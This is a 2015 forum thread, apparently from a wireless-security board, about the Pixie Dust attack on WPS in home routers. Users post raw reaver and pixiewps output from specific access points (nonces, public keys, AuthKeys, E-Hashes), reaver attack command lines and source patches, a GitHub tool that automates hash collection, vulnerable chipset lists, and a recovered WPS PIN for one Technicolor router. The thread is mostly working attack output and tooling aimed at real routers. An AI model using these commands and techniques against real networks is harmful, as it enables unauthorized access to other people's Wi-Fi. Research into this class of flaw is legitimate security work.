[Pixie-Dust] [+] WPS pin: 19048185

someone_else
2015-04-26, 09:18
Sorry for off-topic, i've got further information about Compal:

MAC-Address 5C:35:3B:xx:xx:xx
cbn–zyy–xxx-xxx
Serial-Number: NNNNNxxxxxxxxx
In mine 8 cases, "N" is 53059.(Convert this Number (with leading zero)in HEX and you get 353B,Part of the MAC-Address.
The other 9 Numbers "x" are the last 6 Letters from the MAC-Address in Decimal.
And cbn should be something like „Compal Broadband Network“.

Later last Day i've got two Compal-Models with MAC-Address (DC:53:7C), each of them have a different Pin :


[P] E-Nonce: 00:b1:56:19:7a:47:6b:c8:28:93:26:7b:73:87:41:43
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: f2:60:5d:f8:f9:f6:51:7b:50:12:9d:96:2d:67:45:96:40 :57:9b:65:54:b0:37:45:c7:4d:e8:8b:0b:ee:4e:8a:c0:7 4:6c:15:e6:26:8b:a8:b2:e3:9b:61:29:c9:26:83:a7:35: 2b:e2:84:e3:e3:6c:d5:40:a0:5e:49:37:66:95:4a:a8:9d :c2:e0:cd:7e:72:ac:52:48:1b:86:bb:47:9b:f9:d9:c8:b 2:4b:12:0b:58:35:f1:2e:93:48:fa:38:2e:9c:5e:cd:a4: be:ba:f2:cf:e7:e0:e4:ba:bb:20:12:f1:c4:a0:8a:9c:02 :ed:54:ac:26:a0:25:9a:b5:55:ad:92:ef:07:a8:09:c4:f 1:38:36:c5:65:8c:98:70:cd:3e:ac:4f:76:79:90:64:f2: 55:59:8e:8c:76:95:15:51:28:7d:f7:b8:b7:01:10:f4:48 :a2:84:b1:20:f1:90:4a:4b:c8:af:23:58:de:5d:64:12:e 8:ab:35:46:f2:4b:00:bb:3c
[P] AuthKey: 57:0f:2c:2d:b9:96:9a:ca:96:07:fd:86:c3:f2:b2:cd:7d :27:9b:d3:b4:a5:5b:89:65:62:3a:8a:51:a8:74:57
[P] E-Hash1: 2e:c6:22:b4:6e:cf:d7:cb:ec:bf:b1:bc:d1:91:76:75:a6 :6a:84:52:3c:55:48:b1:cf:e2:27:da:e8:0c:c5:70
[P] E-Hash2: e6:28:3f:35:de:2d:a3:bd:4a:88:bc:2b:27:fa:24:22:58 :0b:b9:ca:83:ba:75:dc:dd:6c:aa:81:5e:ce:61:e4

AND HERE:


[P] E-Nonce: 10:7b:c3:b1:65:cd:d7:fb:75:48:55:18:1c:3e:00:fc
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: cf:bc:97:7a:fe:b1:27:2c:4e:95:da:d1:92:87:01:70:8d :e3:f1:cc:f8:6c:1d:e6:26:23:c9:62:67:e0:37:71:8b:7 7:8b:c1:f4:ce:12:7b:f9:fb:0f:27:6f:78:99:77:27:2b: 70:ce:b5:c9:41:d3:dd:07:d8:78:fc:d7:7d:45:2d:b9:f5 :e2:33:40:67:20:66:68:12:0f:66:b3:bd:8b:e9:4e:57:f 5:ca:ea:91:11:7a:fb:2c:bd:05:f5:59:ec:4e:5e:10:a5: 04:20:59:bd:04:c5:6c:d1:28:7c:03:e5:c2:5c:ec:15:b9 :98:e0:65:e8:07:2e:3f:f0:b7:05:29:a9:ad:a5:c6:f8:1 c:a5:30:f0:1b:ea:d2:bb:23:c7:1b:e3:b4:0e:dd:65:a9: d2:98:4d:e8:28:bd:fa:ba:fe:dc:66:b5:ed:28:86:e1:59 :97:f9:d9:4a:93:1f:fe:cb:86:30:c4:12:54:a1:cf:16:d c:e8:5d:9e:15:aa:a5:6c:bf
[P] AuthKey: 3c:1c:17:cb:bf:d0:e9:c0:95:c2:ef:64:04:64:c6:94:0a :c3:45:7d:f3:66:89:1e:69:9e:4f:a2:d0:6c:a3:6b
[P] E-Hash1: 24:ba:d7:f0:b9:7e:24:ae:f8:57:28:13:26:61:56:3d:67 :6e:02:2f:8d:50:df:74:89:53:50:91:70:e9:b1:64
[P] E-Hash2: a6:ad:3b:e8:e0:ed:1c:06:9c:cc:4b:0b:f1:79:b6:af:f5 :69:ef:97:ca:78:1e:01:68:1d:22:54:6f:57:d4:f1

/\/\

NOT VULNERABLE:

Linksys WRT120n
Atheros AR9285


[P] E-Nonce: 6f:e3:4f:8b:e4:83:08:41:8d:5e:b8:98:cc:71:f2:8f
[P] PKE: f3:d3:80:1b:b8:f7:00:01:74:bb:3f:8d:dc:bc:17:ee:5f :e1:0e:c5:c3:ad:23:43:29:ad:b6:bc:7b:97:84:86:a2:e d:20:f9:5a:a6:72:64:1d:51:b9:da:7b:5d:e8:34:9b:a3: 36:05:f1:6c:c4:8c:54:37:74:ed:d3:36:9e:e4:cc:08:e4 :92:c6:ed:0f:e1:f1:c4:b8:36:bb:9d:03:97:01:89:ff:6 2:ce:2e:3f:38:1e:8d:fb:f1:85:9d:af:b5:16:99:ad:51: d5:03:d8:c3:77:f2:00:8c:7e:02:09:77:ef:31:58:33:13 :da:3e:35:b4:67:77:ff:04:60:5f:fe:e5:0b:ff:a2:e3:f d:06:86:c1:b7:f8:bd:1b:a5:d9:45:c7:e4:d2:8e:20:99: 66:4b:b3:62:0d:66:cc:ed:11:6b:d8:5c:fb:7b:1f:46:c9 :7c:ae:e1:00:f1:e9:70:6b:69:22:bf:19:d8:e7:42:67:3 0:61:cb:f6:ad:9e:4e:44:84
[P] PKR: c5:b0:0a:28:4d:ba:ad:2f:05:ce:53:76:fa:fc:98:32:4a :ff:75:59:22:6e:06:aa:1f:15:be:48:bc:44:55:66:98:e a:a0:9d:d3:81:bd:df:53:55:6a:55:f0:68:63:1c:6a:b5: 53:5a:3a:a6:5a:12:54:1f:82:4a:f0:7e:1a:9c:15:96:dd :0c:7b:e1:fa:ea:c1:e8:cc:5f:e0:0b:24:47:ee:1e:a8:8 4:d1:06:80:ea:e3:24:ac:40:66:29:7c:ae:79:66:42:00: c8:82:4a:b1:c9:a4:3a:04:34:b6:42:dc:4a:81:79:c1:40 :c6:95:80:ff:75:60:2a:1a:62:da:a6:b2:c4:68:19:56:7 7:1f:0a:70:22:fe:3a:76:ac:ba:1d:9d:5b:2d:12:6b:a5: d5:18:7a:bb:5a:d4:3f:f2:59:6f:ca:f6:2b:5b:3b:f8:f1 :92:e2:a7:57:4e:f5:f0:7a:a3:31:6d:6b:52:2a:85:84:7 1:51:c0:b2:11:7d:db:fc:15
[P] AuthKey: 81:fd:7e:7a:3a:53:76:0b:65:f9:1e:e9:fb:a1:1a:89:c4 :98:b3:57:cb:1f:60:69:52:4e:6d:dc:2b:1f:6b:b2
[P] E-Hash1: a6:e9:dc:2d:19:d6:fe:e8:39:32:d9:83:69:b5:25:49:79 :b8:70:27:4d:9b:b4:a1:93:e4:17:0c:36:9e:a0:fe
[P] E-Hash2: b7:73:33:9d:69:d8:d0:e0:fe:5c:1c:b1:a6:8c:41:a4:61 :5e:57:3b:d0:92:86:96:e2:db:f5:e7:bf:56:fa:c5

NOT VULNERABLE:

D-Link 615 B2
Atheros AR5416/Atheros AR2122


[P] E-Nonce: 6e:e4:ae:67:c5:46:86:65:6d:ab:0a:c9:90:2a:89:cb
[P] PKE: e2:4b:6c:da:3b:c9:9c:0a:1f:97:52:69:d4:55:2a:5e:85 :fb:35:bd:f8:d1:47:a3:d3:53:5e:28:b8:ca:74:8f:0c:c 2:8d:4c:18:f8:52:16:54:ee:da:bf:1d:c3:c4:15:a4:0d: 24:96:a9:95:b2:28:d7:ec:a2:87:f8:b4:70:24:fc:aa:c7 :33:bb:fd:b2:e8:ef:7a:df:07:70:d6:df:2c:8b:dd:d1:3 b:f7:fa:1d:cc:53:35:a4:99:d8:77:41:dd:2e:7e:c4:2a: 37:4d:6d:59:90:f5:ed:30:d7:93:82:cf:22:2b:9d:95:08 :3d:cc:bf:cd:78:99:66:ac:a8:81:7f:32:33:63:ae:b6:1 6:f1:d4:e1:10:3f:08:64:f8:86:72:da:c6:97:53:f0:c7: 07:c4:0e:2c:c7:48:30:cc:0b:f0:ba:27:8d:5c:39:4d:68 :cd:3c:b3:19:13:03:7a:be:4d:b1:19:bd:f0:83:f8:40:8 8:82:c9:ee:94:7a:43:8d:2f
[P] PKR: 15:e1:31:80:df:2b:44:9a:9a:21:58:00:42:75:e9:22:23 :ea:96:66:04:e0:0c:12:96:20:a4:51:55:59:2f:ac:ad:b f:e5:c6:60:30:3e:fd:fa:62:b0:cd:f9:26:e7:2a:c7:69: 80:97:ce:f0:ec:6d:03:bb:c5:d2:44:f1:d4:bd:88:be:8f :e2:e7:69:42:10:21:9d:8d:da:d6:d9:58:c7:48:8c:80:4 c:25:76:c4:d8:5b:6d:25:8d:d1:1e:08:ab:10:2b:c0:73: af:7e:a6:c0:0f:8c:4c:61:54:8f:11:fc:18:51:e5:af:62 :c8:19:12:2e:6e:84:0f:35:ad:9b:d6:21:f7:31:f1:00:6 e:55:df:5b:ac:67:cd:1a:36:7c:14:de:f6:e1:01:14:d1: e5:88:78:6c:9a:7a:0e:24:bb:b1:82:97:c9:06:1b:66:7f :50:41:d6:e6:80:e3:28:a7:b9:47:1b:1e:cf:0b:92:da:f 8:50:92:94:de:fa:2e:6c:82
[P] AuthKey: 68:4a:a0:f1:48:81:32:6a:ec:22:e7:2d:4a:ff:4c:97:42 :6c:f4:5c:1c:78:2f:05:73:bd:d4:e3:eb:9b:3a:e4
[P] E-Hash1: 2e:dc:77:bf:39:09:1a:44:a4:1d:45:28:12:64:c1:7d:ca :9e:f4:40:89:44:05:14:10:32:dc:b5:f7:73:24:c3
[P] E-Hash2: 26:4f:77:c9:c9:3e:34:a3:80:c4:07:b8:83:2a:66:a2:51 :04:cd:e6:0f:6a:97:7a:4f:21:37:81:51:04:1e:1f

nuroo
2015-04-26, 13:18
1. Which is the best tool for automated hash collection. Something we could use to gather hashes to send off for analysis, possibly find new holes for pixiewps.

2. Are hashes from locked routers, corrupt - no good 4 analysis?

3. Also any update on Realtek attack?

kcdtv
2015-04-26, 13:46
1.
The best way is simply to save a *.cap file with the PROBES and M messages and to add a *.txt file with the output of modified reaver.
In the case that the chipset and/or the model-manufacturer doesn't appear fully/dirreclty in the probes/stdout of modified reaver, please add manualy this information

2.
They are not corrupted but you need to get m1-m2 and m3 and you will not get this full sequence on a locked router (until it is unlocked again).

3.
Do you know how to "disassemble" firmware? i am stuck and need some help, i found something very interesting on unsupported realteck in parts that can be disassembled easly with binwalk from craig heffner.
basically there is a little *.sh script on startup that generate 4 things ( or check if theses four things have been generated correctly and generate them if that not the case) and one of them is the default WPS PIN.
on this devices the PIN is permanent/unconfigurable http://pix.toile-libre.org/upload/original/1430055858.png
Help would be appreciated

nuroo
2015-04-26, 15:02
The best way is simply to save a *.cap file with the PROBES and M messages

Gonna take a look at wireshark, try and figure it out.
kcdtv, appreciate the responses -very interesting.

Hope someone is developing a tool to automate the process, for noobs. If made easy for noobs like me, we can help build the data collection pool.

someone_else
2015-04-26, 15:10
i use a modified reaver-src. if i set the -o $logfile switch, reaver writes only the pixie-data in the logfile:

For AuthKey make the following changes:

change :

wps_common.c: printf("[P] AuthKey: ");
to :

wps_common.c: cprintf(VERBOSE, "[P] AuthKey: ");
and add a new line in wps_common.c (under #include "wps_dev_attr.h) with:

#include "../misc.h"

And for Messages, you don't need (Here the M1 received Msg):
replace:

exchange.c: cprintf(VERBOSE, "[+] Received M1 message\n");
with:

exchange.c: printf("[+] Received M1 message\n");

i'll search with grep for all reaver messages, and change everything, which is not important for the output-file.
Not the perfect way, but it works ;)

datahead
2015-04-27, 04:38
I do have a fork of autopixiewps i modified a while back that does hash collections, and then produces also a shell script. Ill update my fork in my github repo ( github user name: d8tahead ).

It saves generic reaver output of model info, collects hashes, and produces shell script for coresponding hashes with pixiewps And gives each segment an ID#.

edit:
The one in my repo is a little old, ill update it soon

will post asap

Edit #2:

i had strip out some things from the code, but it should still work fine :)

autopixie has been updated in my repo:
https://github.com/d8tahead/AutoPixieWps

and you will need the new reaver t6x fork ( i added addition of R-Nonce for future pixiewps ) :
https://github.com/t6x/reaver-wps-fork-t6x

for my fork of autopixiewps for the hash gathering, you will need to enable option #5 on the main menu before the wash scan ( pixiehash gathering mode ).

also please note that the logs will be saved as essid and bssid and the prefix of PixieHash in the executing directory!
so be sure to cd to whichever directory you would like the hashes to be saved if executing from a shell.

remember to make autopixiewps.py executable!

aboulatif
2015-04-27, 15:25
after last ur update reavet doesnt work pixiewps: invalid option -- 'm'

Saydamination
2015-04-27, 17:50
İSSUE : ??

I look all pixie test post in this title ... Some modems are invulnerable because manufacturer, wps model numbers are FALSE.!

Example :

Wps Manufacturer : TPLINK
WPs model nambur :1

Tplink uses Realtek and Atheros chipset...

True value :

Wps manufacturer : Atheros
wps model number : WR740..

Other example:

WpsManufakturer : Realtek semicondukter,
Wps Model number : EV-2006-07-27...

Not "EV-2006-07-27" model number , true value :RTL8671

popthattif
2015-04-27, 18:49
Can someone please tell me how to make reaver delay between sending M1 and M2?

soxrok2212
2015-04-27, 19:04
İSSUE : ??

I look all pixie test post in this title ... Some modems are invulnerable because manufacturer, wps model numbers are FALSE.!

Example :

Wps Manufacturer : TPLINK
WPs model nambur :1

Tplink uses Realtek and Atheros chipset...

True value :

Wps manufacturer : Atheros
wps model number : WR740..

Other example:

WpsManufakturer : Realtek semicondukter,
Wps Model number : EV-2006-07-27...

Not "EV-2006-07-27" model number , true value :RTL8671

It is not a problem with reaver, it is just how the AP is configured. You will see the same thing in Wireshark if you look.

Frost.Elrick
2015-04-27, 20:17
Dependencies
[code]
sudo apt-get install libssl-dev
sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev

Couldnt get the libssl-dev its forbidden in repository as kali is unable to update
im running latest live ver. but still can get the package.
pixie is unable to install without ssl.
help me......:confused::confused::confused::confused:

soxrok2212
2015-04-27, 21:19
I confirm it's working on Technicolor TD5130 v2... :

..But not on TD5130 v1 :


wifislax ~ # reaver -i mon0 -b 00:18:E7:XX:XX:XX -c 1 -K 3 -P

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Waiting for beacon from 00:18:E7:XX:XX:XX
[+] Associated with 00:18:E7:XX:XX:XX (ESSID: TNCAPxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] E-Nonce: 55:b3:65:81:7c:d3:2a:9b:72:bf:d2:23:58:93:d9:88
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Technicolor
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1209A1D12783
[P] PKR: 2f:97:c1:c5:de:cd:d7:b5:15:ef:8d:bb:e1:53:7c:9f:5c :3d:d2:48:63:a2:d2:ec:1b:88:69:27:44:d2:be:4f:b6:a 6:b8:07:5b:10:8c:a1:a7:01:ea:b7:f0:71:a9:90:31:78: f4:16:8f:4b:6b:0a:89:48:70:18:ad:93:f7:a7:4f:46:37 :ee:50:cb:64:5f:c6:ec:a4:10:5f:ef:a5:90:0c:3b:e3:b 3:50:e9:2a:6b:ea:ce:b4:c4:7f:51:be:ae:59:45:a8:17: a3:8e:9f:6a:05:9e:6f:8b:76:c4:30:9f:bc:c1:b6:76:2b :6d:dd:4e:3b:26:6c:c9:f5:eb:c6:49:eb:9d:a3:ae:64:5 a:f5:87:88:46:ff:30:3e:87:1a:e0:12:89:81:7f:6e:f3: a2:8b:f5:66:47:66:ab:71:0b:1f:4d:de:9f:d9:d7:c4:cc :c5:73:65:93:75:dd:89:ec:43:b0:2e:7e:51:46:1f:79:e e:70:4b:de:26:8a:21:6c:99
[P] AuthKey: f1:63:8a:98:70:5b:6b:9b:fc:e5:f7:69:c9:a8:fd:01:9c :b8:81:e9:c7:07:44:60:98:f1:c1:70:62:d0:65:f4
[P] E-Nonce: 5f:a2:06:2d:1c:01:6b:cc:67:7e:f6:e7:53:df:38:01
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Technicolor
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1209A1D12783
[P] PKR: 1e:4c:22:6d:a7:ce:f8:b7:d0:16:83:76:33:6b:8f:4f:b1 :9e:6c:8a:a6:7d:6a:4a:14:8e:4e:5b:2e:fa:e5:4e:a1:b 2:d0:a0:65:75:16:a6:10:60:27:8d:31:74:4b:e1:4e:0e: 18:2d:f2:ae:10:3f:2f:14:ff:51:75:24:8b:d3:6a:a4:23 :72:7d:d8:bb:63:6b:89:c9:22:0f:32:e3:1b:bb:2b:b6:3 c:8a:b3:4f:c7:a1:4b:fc:d2:4c:73:9c:1d:3f:ae:6d:aa: 3f:f0:a0:84:51:e2:1f:ca:91:f5:89:44:47:48:3c:23:6e :e0:b5:22:f3:c7:9c:db:3f:91:82:78:9f:73:4a:dd:38:0 0:f4:ee:a9:4f:ce:4a:4c:e8:3f:87:9f:e6:3a:a9:07:90: 31:05:09:a7:7d:3f:e6:03:70:44:61:f8:20:cc:47:c3:15 :dd:50:52:54:ee:99:c4:85:7e:8a:64:8f:0f:60:16:3a:e d:3c:8d:d9:17:3e:ca:22:62
[P] AuthKey: f7:94:e0:53:05:c6:92:37:13:8c:d8:04:54:3a:42:5e:5f :8f:4f:28:ae:7a:51:9e:91:3e:69:e8:f6:c8:68:43
[P] E-Hash1: 51:6d:e5:bc:37:d0:ae:bb:de:b8:6d:91:40:b4:55:1a:c0 :15:a1:32:29:1a:c3:66:9f:3e:6f:38:39:3c:ee:95
[P] E-Hash2: c5:e2:df:28:ed:50:8d:69:31:e9:85:9e:1b:68:12:18:cf :c7:1f:f7:f8:41:f4:01:b3:5a:8e:83:a3:24:9e:96
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 1 s

So we're waiting for a new update of Pixie, and I hope it'll be very soon...

Try this PIN: 76757891

nuroo
2015-04-27, 21:29
What fixes, improvements will pixiewps 1.1 bring?

soxrok2212
2015-04-27, 21:36
What fixes, improvements will pixiewps 1.1 bring?

Full Realtek PRNG brute force, Authkey computation if you don't want to use the modified Reaver, and its a bit more user friendly :D

Laserman75
2015-04-27, 21:53
after last ur update reavet doesnt work pixiewps: invalid option -- 'm'

i have same problem.
whats wrong?

unsuns06
2015-04-27, 21:56
How did you get this PIN ?

I will try it later this week because I'm travelling right now.

Thank you.

nuroo
2015-04-27, 22:17
Sounds good. Great work everybody involved.

Got my first belkin today. first pin generated was the correct one.

soxrok2212
2015-04-27, 22:25
With pixie dust or the pin generator? Model number?

nuroo
2015-04-27, 22:42
with the -W1 option. :o

Saydamination
2015-04-28, 08:24
It is not a problem with reaver, it is just how the AP is configured. You will see the same thing in Wireshark if you look.

Hi,soxrok... I see APPs on wireshark.. And there is problem... Pixie sees wrong values..Look screenshots..


Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 07:34:36:3e:4a:0e:38:df:e7:cd:fa:15:85:92:9e:71
[P] PKE: 0d:da:3b:db:55:f3:68:cf:55:2b:98:93:18:0a:f4:77:28 :58:3d:45:25:58:0a:35:f0:5c:b3:89:7e:3e:3a:f9:dc:4 9:0a:dd:7f:f0:bb:61:3d:20:8a:fb:d7:d7:17:d0:fa:94: ad:26:5a:8d:70:9e:a1:3c:7f:cb:69:9c:a1:a7:f7:b5:d7 :bf:6b:d4:fb:7c:e4:51:fb:f9:6b:9c:ef:5b:94:6c:7d:7 a:4e:40:11:49:83:3d:bb:84:2a:cc:23:f9:3c:63:7f:af: 70:4b:28:33:ea:f5:f5:05:38:19:76:09:8c:6a:8b:37:9e :27:ec:63:96:c1:f4:ab:23:27:d9:57:30:3b:b9:9d:55:e 9:76:5d:81:5c:07:b4:8c:90:0c:02:37:9c:2f:f7:2d:6f: 5b:b2:a0:4f:ee:9a:88:a1:1f:f4:3f:bd:78:6f:d5:8a:48 :6f:fe:c7:b7:c2:da:9e:68:b8:35:0e:3e:e5:f3:4d:e1:4 b:5f:b0:08:c9:d4:9e:a7:93
[P] WPS Manufacturer: AirTies Wireless Networks
[P] WPS Model Number: 1.0.2.0
[P] Access Point Serial Number: AT1731434014674
[+] Received M1 message
[P] PKR: 07:a0:3b:9f:28:60:17:1f:38:52:9e:7e:0b:5f:ef:04:62 :15:b6:86:05:cb:4b:ee:f4:64:4f:a1:fd:35:da:3e:54:a 6:26:c7:93:2a:b5:00:1c:e7:81:37:58:e8:ec:d1:fb:08: 3a:f3:44:53:64:a1:41:02:25:ed:41:87:a5:85:aa:c6:98 :87:7c:41:8f:a0:e6:96:0b:52:b3:bf:18:05:00:18:16:f 0:4c:12:41:e1:bc:ca:e5:12:d0:67:2a:99:cb:04:2f:bb: 21:22:9b:99:38:13:5b:ed:44:52:4e:f8:35:81:9f:98:63 :f7:98:d9:6a:6f:a2:e8:3b:71:13:cd:e4:6a:b9:3e:51:d 2:43:7f:a1:eb:7f:6a:74:5b:06:b2:29:55:5e:c9:27:36: a9:d7:1a:e0:3e:78:35:63:68:33:10:8c:44:64:96:86:96 :03:74:d8:59:df:47:03:26:e3:5c:5b:93:18:ac:71:39:2 9:c5:4e:98:ef:3e:77:73:6a
[P] AuthKey: 99:58:17:50:f0:15:e3:c8:aa:75:c0:0f:fe:47:d7:b8:e8 :f7:bf:af:9d:8a:64:91:74:1c:6f:36:21:1d:72:d5
[+] Sending M2 message
[P] E-Hash1: 80:3f:98:56:4f:6c:f7:64:bf:e9:39:9a:d9:39:24:04:7b :b4:84:44:48:81:6a:6b:e3:ba:c5:ee:86:c5:d1:32
[P] E-Hash2: 79:d2:d0:6a:0e:12:82:d8:ae:9f:32:aa:21:95:07:ef:45 :12:78:a6:ba:60:c2:aa:24:a2:db:b2:ca:51:8b:bb
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 2 s
[Pixie-Dust]


http://imgur.com/XslVDB6


Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 6a:34:66:5e:16:2c:db:cb:5b:11:f7:cc:78:a3:a0:c9
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] PKR: 19:fc:9c:fb:93:99:c3:5b:96:d8:d1:71:92:2e:64:89:85 :5e:b8:c2:51:cc:f0:3d:e5:87:ef:8a:4d:5b:fd:63:bb:4 d:ac:1d:d5:fd:ec:a6:ab:f2:35:80:33:bc:c9:61:4f:f5: 6b:51:ce:1c:64:dd:c8:e2:a2:aa:98:5d:b0:8c:fe:90:1f :db:fb:a1:13:ec:55:29:4f:3e:49:3a:80:62:4d:fe:77:9 e:6e:78:25:5f:5d:30:8f:34:20:2a:28:82:2f:08:23:af: 86:79:29:1c:be:e8:75:af:c8:a7:e9:90:52:2a:15:cd:49 :21:c0:00:62:91:3e:1e:94:11:55:92:28:54:81:89:f9:a f:99:b8:f4:7a:29:80:0a:92:69:18:63:97:5f:85:73:51: af:9b:63:fb:a3:dc:0e:7d:eb:2b:23:3d:8b:4f:50:e5:eb :9b:bc:7e:d6:2b:21:93:09:52:6b:8a:71:d0:33:31:6c:8 2:01:f3:ee:85:77:97:2c:ae
[P] AuthKey: 2b:da:97:bc:a7:06:a8:e9:94:6e:ff:f3:70:e3:84:8d:ec :48:ad:b0:ba:49:74:6b:a0:31:93:db:ac:71:9a:09
[+] Sending M2 message
[P] E-Hash1: 88:a0:55:ea:db:12:db:0d:f4:61:91:5c:3f:e7:11:07:6d :5a:1f:57:b2:7e:fc:6e:34:29:3f:2a:de:56:c8:74
[P] E-Hash2: 97:c4:d6:06:29:db:a1:bf:4c:e9:96:c2:ee:6f:dd:e6:df :b6:30:c1:20:68:e5:2e:d2:ef:d6:82:43:38:31:b6
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 2 s
[Pixie-Dust]


http://imgur.com/fnrrZUn



Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: da:42:7d:5e:4c:b6:a3:98:b5:f3:41:77:42:8e:a6:d8
